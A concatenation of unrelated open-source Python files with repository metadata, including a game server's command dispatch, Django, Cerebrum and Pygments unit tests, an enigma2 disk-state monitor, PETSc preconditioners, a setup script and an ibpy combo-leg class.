self.response.out.write(move.charm_hand)
return
def CommandGetCharmGesture():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
moveid = "m:" + gamename + turn_index + playerid
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if 0 == move.has_charm:
self.response.out.write("-")
else:
self.response.out.write(move.charm_gesture)
return
def CommandBad():
logging.error("Error: Bad command.")
return
{'m' : CommandSetMove,
'g' : CommandGetMove,
'p' : CommandSetPara,
'q' : CommandGetPara,
'C' : CommandSetCharm,
'H' : CommandGetCharmHand,
'G' : CommandGetCharmGesture,
}.get(cmd, CommandBad)()
application = webapp.WSGIApplication(
[('/', MainPage)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
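# A minimal client-side sketch of the lobby protocol served above. The
# base URL is hypothetical; the query parameters ("c", "a", "b", "i")
# come from MainPage.get(). Kept commented out so importing this server
# module stays side-effect free.
#
# import urllib
# import urllib2
#
# BASE = "http://localhost:8080/"  # hypothetical deployment URL
#
# def call(**params):
#     return urllib2.urlopen(BASE + "?" + urllib.urlencode(params)).read()
#
# nonce = call(c="l", a="Merlin", b="3")  # login "Merlin" at level 3
# print call(c="r", i=nonce)              # lobby refresh
# call(c="L", i=nonce)                    # log off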
|
blynn/spelltapper
|
app/spelltapper.py
|
Python
|
gpl-3.0
| 15,729
|
import tkinter
def display():
name = textVar.get()
ch = choice.get()
if ch == 1:
message = "Hello "+name
elif ch == 2:
message = "Goodbye "+name
else:
message = ""
messageLabel.configure(text=message)
top = tkinter.Tk()
textVar = tkinter.StringVar(value="")  # first positional arg is master, so pass value by keyword
textEntry = tkinter.Entry(top,textvariable=textVar,width=12)
textEntry.grid(row=0,column=0)
messageLabel = tkinter.Label(top,text="",width=12)
messageLabel.grid(row=1,column=0)
choice = tkinter.IntVar(value=0)  # likewise: value=0, not master=0
helloButton = tkinter.Radiobutton(top,text="Hello",
variable=choice,value=1,command=display)
helloButton.grid(row=1,column=1)
goodbyeButton = tkinter.Radiobutton(top,text="Goodbye",
variable=choice,value=2,command=display)
goodbyeButton.grid(row=1,column=2)
quitButton = tkinter.Button(top,text="Quit",command=top.destroy)
quitButton.grid(row=1,column=3)
tkinter.mainloop()
|
CajetanP/code-learning
|
Python/UofG/Year1/Semester2/gui_apps.py
|
Python
|
mit
| 884
|
# -*- coding: utf-8 -*-
import logging
import sys
from io import StringIO
from django.core.management import call_command
from django.test import TestCase
from unittest.mock import patch
class RunJobTests(TestCase):
def setUp(self):
sys.stdout = StringIO()
sys.stderr = StringIO()
# Remove old loggers, since utils.setup_logger does not clean up after itself
logger = logging.getLogger("django_extensions.management.commands.runjob")
for handler in list(logger.handlers):
logger.removeHandler(handler)
def test_runs(self):
# lame test...does it run?
call_command('runjob', 'cache_cleanup', verbosity=2)
self.assertIn("Executing job: cache_cleanup (app: None)", sys.stdout.getvalue())
def test_sample_job(self):
call_command('runjob', 'sample_job', verbosity=2)
self.assertIn("Executing job: sample_job (app: None)", sys.stdout.getvalue())
self.assertIn("executing empty sample job", sys.stdout.getvalue())
def test_list_jobs(self):
call_command('runjob', '-l', verbosity=2)
self.assertRegex(sys.stdout.getvalue(), "tests.testapp +- sample_job +- +- My sample job.\n")
def test_list_jobs_appconfig(self):
with self.modify_settings(INSTALLED_APPS={
'append': 'tests.testapp.apps.TestAppConfig',
'remove': 'tests.testapp',
}):
call_command('runjob', '-l', verbosity=2)
self.assertRegex(sys.stdout.getvalue(), "tests.testapp +- sample_job +- +- My sample job.\n")
def test_runs_appconfig(self):
with self.modify_settings(INSTALLED_APPS={
'append': 'tests.testapp.apps.TestAppConfig',
'remove': 'tests.testapp',
}):
call_command('runjob', 'sample_job', verbosity=2)
self.assertIn("Executing job: sample_job (app: None)", sys.stdout.getvalue())
self.assertIn("executing empty sample job", sys.stdout.getvalue())
def test_should_print_that_job_not_found(self):
call_command('runjob', 'test_job', verbosity=2)
self.assertIn("Error: Job test_job not found", sys.stdout.getvalue())
def test_should_print_that_applabel_not_found(self):
call_command('runjob', 'test_job', 'test_app', verbosity=2)
self.assertIn("Error: Job test_app for applabel test_job not found", sys.stdout.getvalue())
def test_should_always_print_list_option_usage_if_job_or_applabel_not_found(self):
call_command('runjob', 'test_job', verbosity=2)
self.assertIn("Use -l option to view all the available jobs", sys.stdout.getvalue())
@patch('django_extensions.management.commands.runjob.get_job')
def test_should_print_traceback(self, m_get_job):
m_get_job.return_value.return_value.execute.side_effect = Exception
call_command('runjob', 'test_job', 'test_app')
self.assertIn("ERROR OCCURED IN JOB: test_app (APP: test_job)", sys.stdout.getvalue())
self.assertIn("Traceback (most recent call last):", sys.stdout.getvalue())
|
django-extensions/django-extensions
|
tests/management/commands/test_runjob.py
|
Python
|
mit
| 3,083
|
from Source import Source
from Components.Element import cached
from Components.Harddisk import harddiskmanager
from Components.config import config
from enigma import eTimer
from Components.SystemInfo import SystemInfo
class HddState(Source):
ALL = 0
INTERNAL = 1
INTERNAL_HDD = 2
INTERNAL_SSD = 3
EXTERNAL = 4
def __init__(self, session, poll=600, type=0, diskName=True, allVisible=False):
Source.__init__(self)
self.session = session
if type == 1:
self.type = self.INTERNAL
elif type == 2:
self.type = self.INTERNAL_HDD
elif type == 3:
self.type = self.INTERNAL_SSD
elif type == 4:
self.type = self.EXTERNAL
else:
self.type = self.ALL
self.isSleeping = False
self.state_text = ""
self.isHDD()
self.diskName = diskName
self.allVisible = allVisible
self.standby_time = poll
self.timer = eTimer()
self.timer.callback.append(self.updateHddState)
self.idle_time = int(config.usage.hdd_standby.value)
config.usage.hdd_standby.addNotifier(self.setStandbyTime, initial_call=False)
if self.hdd_list:
self.updateHddState(force=True)
if self.onPartitionAddRemove not in harddiskmanager.on_partition_list_change:
harddiskmanager.on_partition_list_change.append(self.onPartitionAddRemove)
def onPartitionAddRemove(self, state, part):
self.timer.stop()
self.isHDD()
self.updateHddState(force=True)
def updateHddState(self, force=False):
prev_state = self.isSleeping
string = ""
state = False
if self.hdd_list:
for hdd in self.hdd_list:
if string and self.diskName:
string += " "
if (hdd[1].max_idle_time or force) and not hdd[1].isSleeping():
state = True
if self.diskName:
color = state and "\c0000??00" or "\c00????00"
string += color
name = "I"
if not hdd[1].internal:
name = "E"
elif not hdd[1].rotational:
name = "S"
string += name
if not state:
if self.allVisible:
if not string:
string = "\c0000??00"
string += "standby"
self.isSleeping = False
idle = self.standby_time
else:
if not string:
string = "\c0000??00"
string += "active"
self.isSleeping = True
idle = self.idle_time
if self.idle_time:
timeout = len(self.hdd_list) > 1 and self.standby_time or idle
self.timer.start(timeout * 100, True)
else:
self.isSleeping = False
if string:
string = "Disk state: " + string
self.state_text = string
if prev_state != self.isSleeping or force:
if SystemInfo["LCDsymbol_hdd"]:
                with open(SystemInfo["LCDsymbol_hdd"], "w") as f:
                    f.write(self.isSleeping and "1" or "0")
self.changed((self.CHANGED_ALL,))
def setStandbyTime(self, cfgElem):
self.timer.stop()
self.idle_time = int(cfgElem.value)
self.updateHddState(force=True)
def isHDD(self):
self.hdd_list = []
if harddiskmanager.HDDCount():
for hdd in harddiskmanager.HDDList():
if hdd[1].idle_running and not hdd[1].card:
if self.type == self.ALL:
self.hdd_list.append(hdd)
elif self.type == self.INTERNAL:
if hdd[1].internal:
self.hdd_list.append(hdd)
elif self.type == self.INTERNAL_HDD:
if hdd[1].internal and hdd[1].rotational:
self.hdd_list.append(hdd)
elif self.type == self.INTERNAL_SSD:
if hdd[1].internal and not hdd[1].rotational:
self.hdd_list.append(hdd)
elif self.type == self.EXTERNAL:
if not hdd[1].internal:
self.hdd_list.append(hdd)
def doSuspend(self, suspended):
pass
@cached
def getText(self):
return self.state_text
text = property(getText)
@cached
def getBoolean(self):
return self.isSleeping and True or False
boolean = property(getBoolean)
@cached
def getValue(self):
return self.isSleeping
value = property(getValue)
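# A standalone restatement of the filter rules applied in isHDD() above,
# assuming only each hdd object's 'internal' and 'rotational' flags
# decide membership (a reference sketch, not used by the class itself):
def _matches_type(disk_type, internal, rotational):
    return {
        HddState.ALL: True,
        HddState.INTERNAL: internal,
        HddState.INTERNAL_HDD: internal and rotational,
        HddState.INTERNAL_SSD: internal and not rotational,
        HddState.EXTERNAL: not internal,
    }[disk_type]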
|
athoik/enigma2
|
lib/python/Components/Sources/HddState.py
|
Python
|
gpl-2.0
| 3,740
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Basic tests for Cerebrum.Entity.EntitySpread. """
import pytest
@pytest.fixture
def entity_spread(Spread, entity_type):
code = Spread('f303846618175b16',
entity_type,
description='Test spread for entity_type')
code.insert()
return code
@pytest.fixture
def entity_spread_alt(Spread, entity_type):
code = Spread('b36b563d6a4db0e5',
entity_type,
description='Second test spread for entity_type')
code.insert()
return code
@pytest.fixture
def Entity(entity_module):
u""" Branch and test each subtype of Entity. """
return getattr(entity_module, 'EntitySpread')
@pytest.fixture
def entity_obj(database, Entity):
u""" An instance of Entity, with database. """
return Entity(database)
@pytest.fixture
def entity_simple(entity_obj, entity_type):
u""" entity_obj, but populated. """
entity_obj.populate(entity_type)
entity_obj.write_db()
return entity_obj
@pytest.fixture
def entity(entity_simple, entity_spread, entity_spread_alt):
u""" entity_simple, but with spreads. """
entity_simple.add_spread(entity_spread)
entity_simple.add_spread(entity_spread_alt)
return entity_simple
@pytest.fixture
def entities(entity_obj, entity_type, entity_spread, entity_spread_alt):
u""" Entity info on four entities with different sets of spreads. """
entities = list()
spread_dist = [
(),
(entity_spread, ),
(entity_spread, entity_spread_alt, ),
(entity_spread_alt, ), ]
for spreads in spread_dist:
try:
entry = dict()
entity_obj.populate(entity_type)
entity_obj.write_db()
for spread in spreads:
entity_obj.add_spread(spread)
entry = {
'entity_id': entity_obj.entity_id,
'entity_type': entity_obj.entity_type,
'spreads': spreads, }
entities.append(entry)
except Exception:
entity_obj._db.rollback()
raise
finally:
entity_obj.clear()
return entities
def test_delete_with_spread(entity):
from Cerebrum.Errors import NotFoundError
entity_id = entity.entity_id
entity.delete()
entity.clear()
with pytest.raises(NotFoundError):
entity.find(entity_id)
def test_get_spread(entity, entity_spread, entity_spread_alt):
spreads = [row['spread'] for row in entity.get_spread()]
assert all(int(spread) in spreads
for spread in (entity_spread, entity_spread_alt))
def test_has_spread(entity_simple, entity_spread, entity_spread_alt):
entity_simple.add_spread(entity_spread_alt)
assert entity_simple.has_spread(entity_spread_alt)
assert not entity_simple.has_spread(entity_spread)
entity_simple.add_spread(entity_spread)
assert entity_simple.has_spread(entity_spread)
def test_delete_spread(entity, entity_spread, entity_spread_alt):
entity.delete_spread(entity_spread)
assert not entity.has_spread(entity_spread)
assert entity.has_spread(entity_spread_alt)
def test_list_spreads(entity, entity_type, entity_spread, entity_spread_alt):
columns = ['spread_code', 'spread', 'description', 'entity_type',
'entity_type_str']
all_spreads = entity.list_spreads()
assert len(all_spreads) >= len((entity_spread, entity_spread_alt))
for col in columns:
assert col in dict(all_spreads[0])
# 'entity_spread' and 'entity_spread_alt' should be the only spreads that
# apply to 'entity_type'
entity_spreads = entity.list_spreads(entity_types=entity_type)
assert len(entity_spreads) == len((entity_spread, entity_spread_alt))
assert entity_spread.description in [r['description'] for r in
entity_spreads]
assert str(entity_spread_alt) in [r['spread'] for r in entity_spreads]
def test_list_all_with_spread(entity_obj, entities):
spreads = {spread for ent in entities for spread in ent['spreads']}
result = entity_obj.list_all_with_spread(spreads=spreads)
result_ids = {r['entity_id'] for r in result}
for entry in entities:
if entry['spreads']:
assert entry['entity_id'] in result_ids
else:
assert entry['entity_id'] not in result_ids
def test_list_entity_spreads(entity_obj, entities, entity_type):
expected = [(long(ent['entity_id']), long(int(spread)))
for ent in entities
for spread in ent['spreads']]
entity_types = {ent['entity_type'] for ent in entities}
all_results = entity_obj.list_entity_spreads()
assert len(all_results) >= len(expected)
results = entity_obj.list_entity_spreads(entity_types=entity_types)
assert list(tuple(r) for r in results) == expected
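# The fixture chain above composes as: entity_obj -> entity_simple
# (populated and written to the db) -> entity (both spreads added);
# 'entities' builds four rows covering every subset of the two spreads.
# A test simply names the deepest fixture it needs, e.g.:
#
#     def test_spread_count(entity, entity_spread, entity_spread_alt):
#         assert len(list(entity.get_spread())) >= 2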
|
unioslo/cerebrum
|
testsuite/tests/test_core/test_core_Entity/test_EntitySpread.py
|
Python
|
gpl-2.0
| 4,894
|
#!/usr/bin/env python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See LICENSE for more details.
"""Connect with remote-viewer from client VM to guest VM.
"""
import logging
from avocado.core import exceptions
from spice.lib import stest
from spice.lib import utils
from spice.lib import act
logger = logging.getLogger(__name__)
def run(vt_test, test_params, env):
"""Run remote-viewer at client VM.
Parameters
----------
vt_test : avocado.core.plugins.vt.VirtTest
QEMU test object.
test_params : virttest.utils_params.Params
Dictionary with the test parameters.
env : virttest.utils_env.Env
Dictionary with test environment.
"""
test = stest.ClientGuestTest(vt_test, test_params, env)
cfg = test.cfg
act.x_active(test.vmi_c)
act.x_active(test.vmi_g)
with act.new_ssn_context(test.vmi_c, dogtail_ssn=test.vmi_c.vm.is_rhel8(),
name="Remote Viewer") as ssn:
act.rv_connect(test.vmi_c, ssn)
try:
act.rv_chk_con(test.vmi_c)
except utils.SpiceUtilsError as e:
logger.info("Test failed as expected. Reason: %s", e)
else:
raise exceptions.TestFail(
"RV connection was established when it was supposed to fail.")
|
spiceqa/tp-spice
|
spice/tests/rv_connect_fail.py
|
Python
|
gpl-2.0
| 1,694
|
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
from PackageName.PETScFunc import PETScMatOps
def PCD(A, b):
u = PETScMatOps.PETScMultiDuplications(b,3)
A['kspL'].solve(b,u[0])
A['Fp'].mult(u[0],u[1])
A['kspM'].solve(u[1],u[2])
return u[2]
def LSC(A, b):
u = b.duplicate()
A['kspL'].solve(b,u)
y = A['scaledBt'].getVecLeft()
A['scaledBt'].mult(u,y)
x = A['F'].getVecLeft()
A['F'].mult(y,x)
u.set(0)
A['scaledBt'].multTranspose(x,u)
y.destroy()
y = u.duplicate()
A['kspL'].solve(u,y)
return y
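# Both routines appear to implement the standard Navier-Stokes
# Schur-complement approximations (cf. Elman, Silvester & Wathen):
#   PCD: S^{-1} \approx M_p^{-1} F_p A_p^{-1}
#        with A_p the pressure Laplacian ('kspL'), F_p the pressure
#        convection-diffusion operator, and M_p the pressure mass
#        matrix ('kspM');
#   LSC: S^{-1} \approx X^{-1} (B W^{-1} F W^{-1} B^T) X^{-1},
#        X = B W^{-1} B^T, with 'kspL' solving X and 'scaledBt'
#        holding W^{-1} B^T.
# This is a hedged reading of the dict keys used above, not a
# documented API of this package.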
|
wathen/PhD
|
MHD/FEniCS/MyPackage/PackageName/Preconditioners/NSapprox.py
|
Python
|
mit
| 605
|
import sys
def setup():
return
def run(core, actor, target, commandString):
if actor and target:
core.groupService.handleGroupKick(actor, target)
return
|
agry/NGECore2
|
scripts/commands/dismissgroupmember.py
|
Python
|
lgpl-3.0
| 162
|
from inspect import cleandoc
from coala_utils.decorators import (
enforce_signature, generate_consistency_check)
@generate_consistency_check('definition', 'example', 'example_language',
'importance_reason', 'fix_suggestions')
class Documentation:
"""
This class contains documentation about an aspectclass.
The documentation is consistent if all members are given:
>>> Documentation('defined').check_consistency()
False
>>> Documentation('definition', 'example',
... 'example_language', 'importance',
... 'fix').check_consistency()
True
"""
@enforce_signature
def __init__(self, definition: str='', example: str='',
example_language: str='', importance_reason: str='',
fix_suggestions: str=''):
"""
Contains documentation for an aspectclass.
:param definition: What is this about?
:param example: An example in a well known language.
:param example_language: The language used for the example.
:param importance_reason: A reason why this aspect is important.
:param fix_suggestions: Suggestions on how this can be fixed.
"""
self.definition = cleandoc(definition)
self.example = cleandoc(example)
self.example_language = cleandoc(example_language)
self.importance_reason = cleandoc(importance_reason)
self.fix_suggestions = cleandoc(fix_suggestions)
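# Example usage, mirroring the doctest above (the values are
# illustrative):
#
#     doc = Documentation(definition='Lines should not be too long.',
#                         example='x = 1  # short enough',
#                         example_language='python',
#                         importance_reason='Long lines hurt readability.',
#                         fix_suggestions='Break the line up.')
#     assert doc.check_consistency()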
|
refeed/coala
|
coalib/bearlib/aspects/docs.py
|
Python
|
agpl-3.0
| 1,522
|
import ast
import sys
import os
import re
from setuptools import setup
path = os.path.join(os.path.dirname(__file__), 'dirty_models', '__init__.py')
with open(path, 'r') as file:
t = compile(file.read(), path, 'exec', ast.PyCF_ONLY_AST)
for node in (n for n in t.body if isinstance(n, ast.Assign)):
if len(node.targets) != 1:
continue
name = node.targets[0]
if not isinstance(name, ast.Name) or \
name.id not in ('__version__', '__version_info__', 'VERSION'):
continue
v = node.value
if isinstance(v, ast.Str):
version = v.s
break
if isinstance(v, ast.Tuple):
r = []
for e in v.elts:
if isinstance(e, ast.Str):
r.append(e.s)
elif isinstance(e, ast.Num):
r.append(str(e.n))
version = '.'.join(r)
break
install_requires = ['python-dateutil']
if sys.version_info < (3, 4):
install_requires.append('enum34')
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as desc_file:
long_desc = desc_file.read()
invalid_roles = ['meth', 'class', 'attr']
long_desc = re.sub(r':(?:{}):`([^`]+)`'.format('|'.join(invalid_roles)), r'`\1`', long_desc)
setup(
name='dirty-models',
url='https://github.com/alfred82santa/dirty-models',
author='alfred82santa',
version=version,
author_email='alfred82santa@gmail.com',
license='BSD',
classifiers=[
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: BSD License',
'Development Status :: 4 - Beta'],
packages=['dirty_models'],
include_package_data=False,
install_requires=install_requires,
description="Dirty models for python 3",
long_description=long_desc,
test_suite="nose.collector",
tests_require="nose",
zip_safe=True,
)
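# A compact standalone variant of the version scan above, handling only
# the plain-string form of __version__ (the function name here is
# illustrative, not part of this package):
def read_version(module_path):
    """Return __version__ from a module file without importing it."""
    with open(module_path) as f:
        tree = ast.parse(f.read(), module_path)
    for node in tree.body:
        if isinstance(node, ast.Assign) and len(node.targets) == 1:
            target = node.targets[0]
            if isinstance(target, ast.Name) and target.id == '__version__':
                return ast.literal_eval(node.value)
    raise RuntimeError('__version__ not found in %s' % module_path)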
|
alfred82santa/dirty-models
|
setup.py
|
Python
|
bsd-2-clause
| 2,158
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##
# Translated source for ComboLeg.
##
# Source file: ComboLeg.java
# Target file: ComboLeg.py
#
# Original file copyright original author(s).
# This file copyright Troy Melhase, troy@gci.net.
#
# WARNING: all changes to this file will be lost.
from ib.lib.overloading import overloaded
from ib.ext.Util import Util
class ComboLeg(object):
""" generated source for ComboLeg
"""
SAME = 0
OPEN = 1
CLOSE = 2
UNKNOWN = 3
m_conId = 0
m_ratio = 0
m_action = ""
m_exchange = ""
m_openClose = 0
m_shortSaleSlot = 0
m_designatedLocation = ""
@overloaded
def __init__(self):
pass # super(ComboLeg, self).__init__(0, 0, None, None, 0, 0, None)
@__init__.register(object, int, int, str, str, int)
def __init___0(self, p_conId,
p_ratio,
p_action,
p_exchange,
p_openClose):
pass # super(ComboLeg, self).__init__(p_conId, p_ratio, p_action, p_exchange, p_openClose, 0, None)
@__init__.register(object, int, int, str, str, int, int, str)
def __init___1(self, p_conId,
p_ratio,
p_action,
p_exchange,
p_openClose,
p_shortSaleSlot,
p_designatedLocation):
self.m_conId = p_conId
self.m_ratio = p_ratio
self.m_action = p_action
self.m_exchange = p_exchange
self.m_openClose = p_openClose
self.m_shortSaleSlot = p_shortSaleSlot
self.m_designatedLocation = p_designatedLocation
def __eq__(self, p_other):
if self is p_other:
return True
else:
if p_other is None:
return False
l_theOther = p_other
if (self.m_conId != l_theOther.m_conId) or (self.m_ratio != l_theOther.m_ratio) or (self.m_openClose != l_theOther.m_openClose) or (self.m_shortSaleSlot != l_theOther.m_shortSaleSlot):
return False
if (Util.StringCompareIgnCase(self.m_action, l_theOther.m_action) != 0) or (Util.StringCompareIgnCase(self.m_exchange, l_theOther.m_exchange) != 0) or (Util.StringCompareIgnCase(self.m_designatedLocation, l_theOther.m_designatedLocation) != 0):
return False
return True
|
kkanahin/ibpy
|
ib/ext/ComboLeg.py
|
Python
|
bsd-3-clause
| 2,415
|
import os
from config import config
from incremental_upload_handler import IncrementalUploadHandler
from Utils.util import FileUtil
from file_entity import FileEntity
def gen_test_data():
server_file = os.path.join(config.server_folder,'test.txt')
client_file = os.path.join(config.client_folder,'test.txt')
data = ''
    length = 24
    for i in range(0, length):
        data += 'A'
    FileUtil.write_file_data(server_file, data)
    data = ''
    for i in range(0, length):
        if i == 14:
            data += 'B'
        else:
            data += 'A'
    FileUtil.write_file_data(client_file, data)
if __name__ == "__main__":
gen_test_data()
server_file_path = os.path.join(config.server_folder,'test.txt')
client_file_path = os.path.join(config.client_folder,'test.txt')
server_file = FileEntity(server_file_path)
client_file = FileEntity(client_file_path)
server_handler = IncrementalUploadHandler(server_file)
server_handler.TEST_gen_server_blocks_map()
adler32_pair = server_handler.compute_check_sum()
#for i in range(0,len(adler32_pair) % 10):
# print adler32_pair[i]
client_handler = IncrementalUploadHandler(client_file,adler32_pair)
server_handler.server_adler32_pair = adler32_pair
diffs = client_handler.diff()
log = ''
for i in range(0,len(diffs)):
log += str(diffs[i])
FileUtil.write_file_data(r'D:\test\log.log',log)
new_server_file_info = server_handler.gen_data_block(diffs)
#for i in range(0,len(new_server_file_info)):
# print new_server_file_info[i]
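# A minimal sketch of the per-block weak checksum an rsync-style flow
# like the one above depends on, using stdlib zlib.adler32. The real
# IncrementalUploadHandler presumably rolls the checksum incrementally;
# this reference version simply recomputes it block by block.
import zlib

def block_checksums(data, block_size=8):
    return [zlib.adler32(data[i:i + block_size])
            for i in range(0, len(data), block_size)]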
|
JasonJDong/CompressBinary
|
IncrementalUpdate/IncrementalUpdate/main.py
|
Python
|
gpl-2.0
| 1,595
|
# -*- coding: utf-8 -*-
"""
Tests for QBasic
~~~~~~~~~~~~~~~~
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import glob
import os
import unittest
from pygments.token import Token
from pygments.lexers.qbasic import QBasicLexer
class QBasicTest(unittest.TestCase):
def setUp(self):
self.lexer = QBasicLexer()
self.maxDiff = None
def testKeywordsWithDollar(self):
fragment = u'DIM x\nx = RIGHT$("abc", 1)\n'
expected = [
(Token.Keyword.Declaration, u'DIM'),
(Token.Text.Whitespace, u' '),
(Token.Name.Variable.Global, u'x'),
(Token.Text, u'\n'),
(Token.Name.Variable.Global, u'x'),
(Token.Text.Whitespace, u' '),
(Token.Operator, u'='),
(Token.Text.Whitespace, u' '),
(Token.Keyword.Reserved, u'RIGHT$'),
(Token.Punctuation, u'('),
(Token.Literal.String.Double, u'"abc"'),
(Token.Punctuation, u','),
(Token.Text.Whitespace, u' '),
(Token.Literal.Number.Integer.Long, u'1'),
(Token.Punctuation, u')'),
(Token.Text, u'\n'),
]
self.assertEqual(expected, list(self.lexer.get_tokens(fragment)))
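    # For ad-hoc inspection outside the test suite, the same lexer can
    # drive pygments.highlight directly (a sketch):
    #
    #     from pygments import highlight
    #     from pygments.formatters import TerminalFormatter
    #     print(highlight(u'DIM x\n', QBasicLexer(), TerminalFormatter()))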
|
markeldigital/design-system
|
vendor/ruby/2.0.0/gems/pygments.rb-0.6.3/vendor/pygments-main/tests/test_qbasiclexer.py
|
Python
|
mit
| 1,322
|